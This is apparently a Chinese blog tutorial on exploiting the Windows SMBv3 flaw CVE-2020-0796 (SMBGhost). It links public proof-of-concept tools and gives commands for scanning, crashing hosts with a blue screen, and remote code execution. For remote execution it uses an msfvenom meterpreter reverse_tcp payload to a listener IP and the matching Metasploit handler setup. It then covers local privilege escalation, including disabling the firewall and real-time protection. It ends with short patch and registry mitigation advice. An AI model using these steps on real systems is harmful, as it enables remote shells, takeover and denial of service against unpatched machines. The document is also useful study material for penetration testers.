CVE-2020-0796 漏洞利用教程


漏洞描述

  Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞,也称为“ Windows SMBv3客户端/服务器远程执行代码漏洞”。

影响版本

  • 适用于32位系统的Windows 10版本1903
  • Windows 10 1903版(用于基于ARM64的系统)
  • Windows 10 1903版(用于基于x64的系统)
  • 适用于32位系统的Windows 10版本1909
  • Windows 10 1909版(用于基于ARM64的系统)
  • Windows 10版本1909(用于基于x64的系统)
  • Windows Server 1903版(服务器核心安装 )
  • Windows Server版本1909(服务器核心安装)

漏洞检测

利用工具:
https://github.com/GuoKerS/aioScan_CVE-2020-0796

使用方法:

#安装python模块
python3 -m pip install netaddr

#脚本利用 python3 aioscan_2020_0796.py <ip>
python3 aioscan_2020_0796.py 192.168.206.137

在这里插入图片描述
提示Vulnerable!!表示存在漏洞

漏洞利用

Windows 10 1903版(用于基于x64的系统) 迅雷下载地址:
thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZlcnNpb25fMTkwM194NjRfZHZkXzhmMDUyNDFkLmlzb1pa

蓝屏攻击

利用工具:
https://github.com/eerykitty/CVE-2020-0796-PoC

使用教程:

#进入下载好的脚本目录,安装python模块
python3 -m pip install -r requirements-test.txt
python3 -m pip install ntlm_auth pyasn1 cryptography

#脚本利用
#python3 CVE-2020-0796.py <ip>
python3 CVE-2020-0796.py 192.168.206.137

在这里插入图片描述

远程代码执行

python版本:3.6.6
需要用到python3.6版本,3.7执行脚本后会蓝屏,并不能远程命令执行。
下载地址:https://www.python.org/downloads/release/python-366/

在这里插入图片描述

利用工具:
https://github.com/chompie1337/SMBGhost_RCE_PoC

下载好工具后,先生成反弹shell的shellcode:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f py -o shellcode.txt

在这里插入图片描述

shellcode.txt中的shell复制出来,替换buf为USER_PAYLOAD

小技巧,windows的文本工具可以替换字符
在这里插入图片描述
将更改好的shellcode复制到我们下载好的脚本exploit.py文件中,替换掉USER_PAYLOAD
在这里插入图片描述
kali开启msf监听:

msfconsole

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run

脚本exp利用攻击:

python36 exploit.py -ip 192.168.206.141

执行显示到[+] Press a key to execute shellcode!时回车
在这里插入图片描述
msf获取shell权限:

shell

在这里插入图片描述

本地提权

利用攻击下载:
https://github.com/danigargu/CVE-2020-0796

需要生成exe,生成exe需要利用到Visual Studio

下载好后打开Visual Studio,载入项目,打开CVE-2020-0796.sln文件
在这里插入图片描述
在这里插入图片描述
生成exe
在这里插入图片描述
生成好后会在你exp目录下存在一个\x64\Debug\文件夹

在这里插入图片描述
将exe文件复制到windows10中,需要先关闭防火墙并关闭实时防护
在这里插入图片描述
脚本利用:

exe是直接运行即可
在这里插入图片描述

修复建议

  1. 及时更新windows或安装补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
  2. 运行regedit.exe,打开注册表编辑器,在HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\ Parameters建立一个名为DisableCompressionDWORD,值为1,禁止SMB的压缩功能。
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-0796漏洞,也被称为"SMBGhost",是一个影响微软Windows操作系统的严重漏洞。该漏洞存在于Windows 10版本1903和1909之间的SMBv3协议中,攻击者可以利用此漏洞执行远程代码,从而控制受感染的系统。 对CVE-2020-0796漏洞进行逆向分析是为了深入了解其工作原理及漏洞利用的具体细节。逆向分析通常包括静态和动态分析两个方面。 首先,静态分析是通过对漏洞程序的反汇编、分析源代码或查看二进制文件等方法来了解漏洞的工作原理。这可以帮助研究人员识别漏洞的关键功能、漏洞的出现位置以及可能的漏洞利用方式。 其次,动态分析是在虚拟化环境中或实际受感染的系统上运行漏洞程序,监视其行为并捕获关键信息。通过动态分析,研究人员能够观察到漏洞利用的具体过程,从而理解攻击者是如何利用漏洞来执行远程代码或获取系统权限的。 在逆向分析过程中,研究人员需要使用一些特定的工具,如反汇编器、调试器以及网络分析工具等。这些工具可以帮助研究人员获取漏洞程序的内部结构、系统调用、网络通信等关键信息,有助于理解漏洞的利用方式和脆弱点。 通过逆向分析CVE-2020-0796漏洞,能够帮助安全专业人员更好地理解漏洞的工作原理,从而开发相应的补丁或安全措施以防止攻击者利用该漏洞入侵系统。此外,逆向分析还有助于提高安全分析人员的能力和知识,进一步提升网络安全的整体水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值